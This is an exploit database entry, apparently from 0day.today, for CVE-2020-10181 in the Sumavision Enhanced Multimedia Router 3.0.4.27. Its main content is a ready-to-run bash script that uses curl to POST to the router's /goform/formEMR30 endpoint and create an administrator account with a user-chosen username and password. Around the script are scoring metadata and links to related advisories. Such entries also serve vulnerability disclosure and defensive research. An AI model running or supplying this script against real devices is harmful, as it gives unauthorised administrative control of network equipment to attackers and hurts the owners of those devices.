Lucene search
Miguel Mendez Z1337DAY-ID-34098HistoryMar 17, 2020 - 12:00 a.m.
Enhanced Multimedia Router 3.0.4.27 Cross Site Request Forgery Vulnerability
2020-03-1700:00:00
Miguel Mendez Z
0day.today
175
0.46 Medium
EPSS
Percentile
97.4%
Exploit for php platform in category web applications
# Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Miguel Mendez Z.
# Vendor Homepage: www.sumavision.com
# Software Link: http://www.sumavision.com/ensite/i.php?id=29
# Version: EMR 3.0.4.27
# CVE : CVE-2020-10181
-----------------------Exploit Bash---------------------------
echo ""
read -p "Set Hostname: " host
read -p "Set username: " user
echo "(The password should be between 6 and 32 in length)"
read -p "Set password: " pass
echo
echo "[+] creating user..."
sleep 2
postdata=$(curl -X POST -d "type=11&cmd=3&language=0&slotNo=255&setString=$user<*1*>administrator<*1*>$pass" "http://$host/goform/formEMR30" -s | grep -i "0")
if echo "$postdata" | grep -q "0</html>"; then
echo "[+] http://$host/frame_en.asp"
echo "[+] created access($user - $pass)"
else
echo "[-] user not created"
fi
------------------------------------------------------
# 0day.today [2020-03-17] #Related
nvd
nvd
CVE-2020-10181
2020-03-11 16:15:12
cvelist
cvelist
CVE-2020-10181
2020-03-11 15:26:04
attackerkb
attackerkb
CVE-2020-10181
2020-03-11 00:00:00
packetstorm
packetstorm
Enhanced Multimedia Router 3.0.4.27 Cross Site Request Forgery
2020-03-16 00:00:00
checkpoint_advisories
checkpoint_advisories
prion
prion
Cross site request forgery (csrf)
2020-03-11 16:15:00
exploitdb
exploitdb
Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)
2020-03-16 00:00:00
cve
cve
CVE-2020-10181
2020-03-11 16:15:12
cisa_kev
cisa_kev
Sumavision EMR Cross-Site Request Forgery (CSRF) Vulnerability
2021-11-03 00:00:00
exploitpack
exploitpack
Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)
2020-03-16 00:00:00